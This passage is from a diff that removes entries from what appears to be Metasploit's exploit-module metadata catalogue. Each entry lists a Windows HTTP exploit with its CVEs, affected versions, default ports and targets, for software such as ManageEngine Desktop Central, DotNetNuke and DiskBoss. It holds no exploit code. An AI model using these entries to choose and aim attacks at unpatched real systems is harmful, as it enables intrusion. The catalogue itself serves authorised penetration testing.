java/jsp_shell_bind_tcp payloads\n seem to be valid.", - "references": [ - "EDB-48558", - "URL-https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php", - "CVE-2020-7356" - ], - "platform": "Java,Windows", - "arch": "java", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/cayin_xpost_sql_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/cayin_xpost_sql_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/cogent_datahub_command": { - "name": "Cogent DataHub Command Injection", - "fullname": "exploit/windows/http/cogent_datahub_command", - "aliases": [], - "rank": 0, - "disclosure_date": "2014-04-29", - "type": "exploit", - "author": [ - "John Leitch", - "juan vazquez " - ], - "description": "This module exploits an injection vulnerability in Cogent DataHub prior\n to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which\n makes insecure use of the datahub_command function with user controlled\n data, allowing execution of arbitrary datahub commands and scripts. This\n module has been tested successfully with Cogent DataHub 7.3.4 on\n Windows 7 SP1. Please also note that after exploitation, the remote service\n will most likely hang and restart manually.", - "references": [ - "ZDI-14-136", - "CVE-2014-3789", - "BID-67486" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Cogent DataHub < 7.3.5" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/cogent_datahub_command.rb", - "is_install_path": true, - "ref_name": "windows/http/cogent_datahub_command", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/cogent_datahub_request_headers_bof": { - "name": "Cogent DataHub HTTP Server Buffer Overflow", - "fullname": "exploit/windows/http/cogent_datahub_request_headers_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-26", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow on Cogent DataHub 7.3.0. The\n vulnerability exists in the HTTP server. While handling HTTP headers, a\n strncpy() function is used in a dangerous way. This module has been tested\n successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.", - "references": [ - "CVE-2013-0680", - "OSVDB-95819", - "BID-53455", - "ZDI-13-178", - "URL-http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 English / Cogent DataHub 7.3.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/cogent_datahub_request_headers_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/coldfusion_fckeditor": { - "name": "ColdFusion 8.0.1 Arbitrary File Upload and Execute", - "fullname": "exploit/windows/http/coldfusion_fckeditor", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-07-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n and Execute vulnerability.", - "references": [ - "CVE-2009-2265", - "OSVDB-55684" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/coldfusion_fckeditor.rb", - "is_install_path": true, - "ref_name": "windows/http/coldfusion_fckeditor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/cyclope_ess_sqli": { - "name": "Cyclope Employee Surveillance Solution v6 SQL Injection", - "fullname": "exploit/windows/http/cyclope_ess_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-08", - "type": "exploit", - "author": [ - "loneferret", - "sinn3r " - ], - "description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n Solution. Because the login script does not properly handle the user-supplied\n username parameter, a malicious user can manipulate the SQL query, and allows\n arbitrary code execution under the context of 'SYSTEM'.", - "references": [ - "OSVDB-84517", - "EDB-20393" - ], - "platform": "Windows", - "arch": "", - "rport": 7879, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Cyclope Employee Surveillance Solution v6.2 or older" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb", - "is_install_path": true, - "ref_name": "windows/http/cyclope_ess_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/desktopcentral_deserialization": { - "name": "ManageEngine Desktop Central Java Deserialization", - "fullname": "exploit/windows/http/desktopcentral_deserialization", - "aliases": [], - "rank": 500, - "disclosure_date": "2020-03-05", - "type": "exploit", - "author": [ - "mr_me", - "wvu " - ], - "description": "This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n Quoting the vendor's advisory on fixed versions:\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of\n that, the complete fix for the remote code execution vulnerability is\n now available in build 10.0.479.\"", - "references": [ - "CVE-2020-10189", - "URL-https://srcincite.io/advisories/src-2020-0011/", - "URL-https://srcincite.io/pocs/src-2020-0011.py.txt", - "URL-https://twitter.com/steventseeley/status/1235635108498948096", - "URL-https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 8383, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/desktopcentral_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [ - "first-attempt-fail" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/desktopcentral_file_upload": { - "name": "ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload", - "fullname": "exploit/windows/http/desktopcentral_file_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-11-11", - "type": "exploit", - "author": [ - "Thomas Hibbert " - ], - "description": "This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to\n v8 build 80293. A malicious user can upload a JSP file into the web root without\n authentication, leading to arbitrary code execution as SYSTEM.", - "references": [ - "CVE-2013-7390", - "OSVDB-100008", - "URL-http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf", - "URL-https://seclists.org/fulldisclosure/2013/Nov/130" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Desktop Central v7 - v8 build 80292 / Windows" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/desktopcentral_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/desktopcentral_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/desktopcentral_statusupdate_upload": { - "name": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload", - "fullname": "exploit/windows/http/desktopcentral_statusupdate_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-08-31", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\n v7 to v9 build 90054 (including the MSP versions).\n A malicious user can upload a JSP file into the web root without authentication, leading to\n arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as\n they do not ship with a bundled Java compiler.", - "references": [ - "CVE-2014-5005", - "OSVDB-110643", - "URL-https://seclists.org/fulldisclosure/2014/Aug/88" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Desktop Central v7 to v9 build 90054 / Windows" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/desktopcentral_statusupdate_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/disk_pulse_enterprise_bof": { - "name": "Disk Pulse Enterprise Login Buffer Overflow", - "fullname": "exploit/windows/http/disk_pulse_enterprise_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-10-03", - "type": "exploit", - "author": [ - "Chris Higgins", - "Tulpa Security" - ], - "description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n 9.0.34. If a malicious user sends a malicious HTTP login request,\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account. Due to size constraints, this module\n uses the Egghunter technique.", - "references": [ - "EDB-40452" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Disk Pulse Enterprise 9.0.34" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/disk_pulse_enterprise_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/disk_pulse_enterprise_get": { - "name": "Disk Pulse Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/disk_pulse_enterprise_get", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-08-25", - "type": "exploit", - "author": [ - "Chance Johnson", - "Nipun Jaswal & Anurag Srivastava" - ], - "description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n 9.9.16. If a malicious user sends a crafted HTTP GET request\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account.", - "references": [ - "EDB-42560" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Disk Pulse Enterprise 9.9.16" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb", - "is_install_path": true, - "ref_name": "windows/http/disk_pulse_enterprise_get", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/diskboss_get_bof": { - "name": "DiskBoss Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/diskboss_get_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-12-05", - "type": "exploit", - "author": [ - "vportal", - "Ahmad Mahfouz", - "Gabor Seljan", - "Jacob Robles" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "EDB-40869", - "EDB-42395" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "DiskBoss Enterprise v7.4.28", - "DiskBoss Enterprise v7.5.12", - "DiskBoss Enterprise v8.2.14" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/diskboss_get_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/diskboss_get_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/disksavvy_get_bof": { - "name": "DiskSavvy Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/disksavvy_get_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-12-01", - "type": "exploit", - "author": [ - "vportal", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2017-6187", - "EDB-40869" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "DiskSavvy Enterprise v9.1.14", - "DiskSavvy Enterprise v9.3.14" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disksavvy_get_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/disksavvy_get_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/disksorter_bof": { - "name": "Disk Sorter Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/disksorter_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.", - "references": [ - "CVE-2017-7230" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Disk Sorter Enterprise v9.5.12" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/disksorter_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/disksorter_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dlink_central_wifimanager_rce": { - "name": "D-Link Central WiFi Manager CWM(100) RCE", - "fullname": "exploit/windows/http/dlink_central_wifimanager_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-07-09", - "type": "exploit", - "author": [ - "M3 ", - "Redouane NIBOUCHA " - ], - "description": "This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)\n versions below `v1.03R0100_BETA6`. The vulnerability exists in the\n username cookie, which is passed to `eval()` without being sanitized.\n Dangerous functions are not disabled by default, which makes it possible\n to get code execution on the target.", - "references": [ - "CVE-2019-13372", - "URL-https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/" - ], - "platform": "PHP", - "arch": "php", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/dlink_central_wifimanager_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dnn_cookie_deserialization_rce": { - "name": "DotNetNuke Cookie Deserialization Remote Code Excecution", - "fullname": "exploit/windows/http/dnn_cookie_deserialization_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-07-20", - "type": "exploit", - "author": [ - "Jon Park", - "Jon Seigel" - ], - "description": "This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.\n Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.\n The expected structure includes a \"type\" attribute to instruct the server which type of object to create on deserialization.\n The cookie is processed by the application whenever it attempts to load the current user's profile data.\n This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration).\n An attacker can leverage this vulnerability to execute arbitrary code on the system.", - "references": [ - "CVE-2017-9822", - "CVE-2018-15811", - "CVE-2018-15812", - "CVE-2018-18325", - "CVE-2018-18326", - "URL-https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf", - "URL-https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html", - "URL-https://github.com/pwntester/ysoserial.net" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "v5.0 - v9.0.0", - "v9.0.1 - v9.1.1", - "v9.2.0 - v9.2.1", - "v9.2.2 - v9.3.0-RC" - ], - "mod_time": "2024-06-18 09:23:41 +0000", - "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/dnn_cookie_deserialization_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dup_scout_enterprise_login_bof": { - "name": "Dup Scout Enterprise Login Buffer Overflow", - "fullname": "exploit/windows/http/dup_scout_enterprise_login_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-11-14", - "type": "exploit", - "author": [ - "sickness", - "Chris Higgins", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in Dup Scout Enterprise\n versions <= 10.0.18. The buffer overflow exists via the web interface\n during login. This gives NT AUTHORITY\\SYSTEM access.\n\n This module has been tested successfully on Dup Scout Enterprise\n versions:\n\n 9.9.14 on Windows 7 SP1 (x64);\n 9.9.14 on Windows XP SP0 (x64);\n 10.0.18 on Windows 7 SP1 (x64);\n 10.0.18 on Windows XP SP0 (x86); and\n 10.0.18 on Windows 10 (1909) (x64).", - "references": [ - "CVE-2017-13696", - "CWE-121", - "EDB-42557", - "EDB-43145", - "EDB-40832" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Dup Scout Enterprise 9.9.14 (x86)", - "Dup Scout Enterprise 10.0.18 (x86)" - ], - "mod_time": "2021-02-25 17:14:25 +0000", - "path": "/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/dup_scout_enterprise_login_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/dupscts_bof": { - "name": "Dup Scout Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/dupscts_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "vportal", - "Daniel Teixeira", - "bcoles " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise versions <= 10.0.18,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server which can be leveraged\n to execute arbitrary code in the context of NT AUTHORITY\\SYSTEM.\n\n This module supports x86 versions of Dup Scout Enterprise and x86\n Windows operating systems only and has been tested successfully on\n Windows 7 SP1 (x86) and Windows XP SP0 (x86).", - "references": [ - "CVE-2017-13696", - "CWE-121", - "EDB-42557", - "EDB-49217" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Dup Scout Enterprise v8.3.16 (x86)", - "Dup Scout Enterprise v8.4.16 (x86)", - "Dup Scout Enterprise v9.0.28 (x86)", - "Dup Scout Enterprise v9.1.14 (x86)", - "Dup Scout Enterprise v9.5.14 (x86)", - "Dup Scout Enterprise v9.9.14 (x86)", - "Dup Scout Enterprise v10.0.18 (x86)" - ], - "mod_time": "2021-02-25 17:12:27 +0000", - "path": "/modules/exploits/windows/http/dupscts_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/dupscts_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easychatserver_seh": { - "name": "Easy Chat Server User Registeration Buffer Overflow (SEH)", - "fullname": "exploit/windows/http/easychatserver_seh", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-10-09", - "type": "exploit", - "author": [ - "Marco Rivoli", - "Aitezaz Mohsin" - ], - "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.", - "references": [ - "EDB-42155" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Easy Chat Server 2.0 to 3.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easychatserver_seh.rb", - "is_install_path": true, - "ref_name": "windows/http/easychatserver_seh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easyfilesharing_post": { - "name": "Easy File Sharing HTTP Server 7.2 POST Buffer Overflow", - "fullname": "exploit/windows/http/easyfilesharing_post", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-06-12", - "type": "exploit", - "author": [ - "bl4ck h4ck3r", - "Marco Rivoli " - ], - "description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.", - "references": [ - "EDB-42186" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Easy File Sharing 7.2 HTTP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easyfilesharing_post.rb", - "is_install_path": true, - "ref_name": "windows/http/easyfilesharing_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easyfilesharing_seh": { - "name": "Easy File Sharing HTTP Server 7.2 SEH Overflow", - "fullname": "exploit/windows/http/easyfilesharing_seh", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-02", - "type": "exploit", - "author": [ - "Starwarsfan2099 " - ], - "description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.", - "references": [ - "EDB-39008" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Easy File Sharing 7.2 HTTP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easyfilesharing_seh.rb", - "is_install_path": true, - "ref_name": "windows/http/easyfilesharing_seh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/easyftp_list": { - "name": "EasyFTP Server list.html path Stack Buffer Overflow", - "fullname": "exploit/windows/http/easyftp_list", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-18", - "type": "exploit", - "author": [ - "ThE g0bL!N", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n EasyFTP allows anonymous access by default; valid credentials are typically\n unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n Due to limited space, as well as difficulties using an egghunter, the use of\n staged, ORD, and/or shell payloads is recommended.", - "references": [ - "OSVDB-66614", - "EDB-11500" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 - Easy FTP Server Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/easyftp_list.rb", - "is_install_path": true, - "ref_name": "windows/http/easyftp_list", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/edirectory_host": { - "name": "Novell eDirectory NDS Server Host Header Overflow", - "fullname": "exploit/windows/http/edirectory_host", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-10-21", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n The web interface does not validate the length of the\n HTTP Host header prior to using the value of that header in an\n HTTP redirect.", - "references": [ - "CVE-2006-5478", - "OSVDB-29993", - "BID-20655" - ], - "platform": "Windows", - "arch": "", - "rport": 8028, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell eDirectory 8.8.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/edirectory_host.rb", - "is_install_path": true, - "ref_name": "windows/http/edirectory_host", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/edirectory_imonitor": { - "name": "eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow", - "fullname": "exploit/windows/http/edirectory_imonitor", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-08-11", - "type": "exploit", - "author": [ - "Unknown", - "Matt Olney " - ], - "description": "This module exploits a stack buffer overflow in eDirectory 8.7.3\n iMonitor service. This vulnerability was discovered by Peter\n Winter-Smith of NGSSoftware.\n\n NOTE: repeated exploitation attempts may cause eDirectory to crash. It does\n not restart automatically in a default installation.", - "references": [ - "CVE-2005-2551", - "OSVDB-18703", - "BID-14548" - ], - "platform": "Windows", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (ALL) - eDirectory 8.7.3 iMonitor" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/edirectory_imonitor.rb", - "is_install_path": true, - "ref_name": "windows/http/edirectory_imonitor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/efs_easychatserver_username": { - "name": "EFS Easy Chat Server Authentication Request Handling Buffer Overflow", - "fullname": "exploit/windows/http/efs_easychatserver_username", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-08-14", - "type": "exploit", - "author": [ - "LSO ", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in EFS Software Easy Chat\n Server versions 2.0 to 3.1. By sending an overly long authentication\n request, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2004-2466", - "OSVDB-7416", - "OSVDB-106841", - "BID-25328" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Easy Chat Server 2.0", - "Easy Chat Server 2.1 - 3.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 